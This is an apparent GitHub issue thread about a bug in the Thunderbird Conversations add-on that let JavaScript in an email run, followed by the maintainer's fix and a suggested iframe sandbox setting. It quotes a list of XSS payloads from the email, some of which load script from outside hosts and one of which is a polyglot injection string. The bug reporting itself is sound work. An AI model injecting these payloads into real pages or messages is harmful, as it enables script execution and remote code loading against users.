### ISSUE TITLE
Unwanted execution of Javascript when reading an email

### ISSUE THREAD

**Issue by jerome-fix** [thunderbird-conversations/thunderbird-conversations#1779]
* **Thunderbird version:** Thunderbird 91.5.1
* **Thunderbird Conversation version:** 4.0.9
* **Operating System:** Linux Debian Sid

**What did you do?**
 
I received and opened the latest Netcraft newsletter (copy of the email attached) and opened it to read it.

Immediately a popup with "Im Watching You!" appeared !
 
![imawatchingyou](https://user-images.githubusercontent.com/3250390/152094446-c9b403ee-f55d-4969-ba4d-67f40a4901ce.png)

In fact all the javascript contained in the following code snippet was executed
```
<ul>
<li><code><script>alert('Im Watching You!')</script></code></li>
<li><code>b"><h1>e<script>alert('benc');</script></code></li>
<li><code><script>alert('XSS')</script></code></li>
<li><code><script src=//0d.al></script></code></li>
<li><code><script>alert("HACKED!");</script></code></li>
<li><code><script>alert(1)</script></code></li>
<li><code>"><script src="https://1y.lc/m"></script></code></li>
<li><code>jaVasCript:"/*'/*`/*"/*</titLe/</teXtarEa/</stYle/</noscRipT//</scRipt/-->{{38.7*9}}[[38.7*9]]((38.7*9))${38.7*9}<scRiPt src=//xn--rda.pw /--></scRipt/-->*/-$.getScript(`//xn--rda.pw`)//</code></li>
<li><code><img src=http://i.giphy.com/sMjmhaWPuzFHa.gif> <script>alert("XSS")</script></code></li>
<li><code><script src=//m3.tel.></code></li>
</ul>
```
This does not happen without "Thunderbird Conversations".

You'll find the incriminate email in attachments : [Netcraft News - Funny and malicious server banners - announce@lists.netcraft.com - 2022-02-01 1420.zip](https://github.com/thunderbird-conversations/thunderbird-conversations/files/7983656/Netcraft.News.-.Funny.and.malicious.server.banners.-.announce%40lists.netcraft.com.-.2022-02-01.1420.zip)

Could you take a look? 

At your disposal for testing.

Jérôme.

**Comment by jerome-fix** [comment]
@Standard8

Thanks !

**Comment by Standard8** [comment]
No problem. I'm sorry this occurred - somewhere along the line blocking stopped working, but I'm not sure yet what caused it.

In any case, it is fixed now (and probably in a better/more permanent way), and the new version 4.0.10 has been approved on the add-ons site, so it should be available for update if it hasn't updated already.

**Comment by jerome-fix** [comment]
I tried 

`this.iframe.setAttribute("sandbox", "allow-same-origin");`

This modification seems to block javascript and allow embedded images, but no assurance if this is enough.

Jérôme.

**Comment by Standard8** [comment]
Sorry about that and thanks for the hint. That seems to work, so I've just posted a new one, hopefully it'll get approved tomorrow.
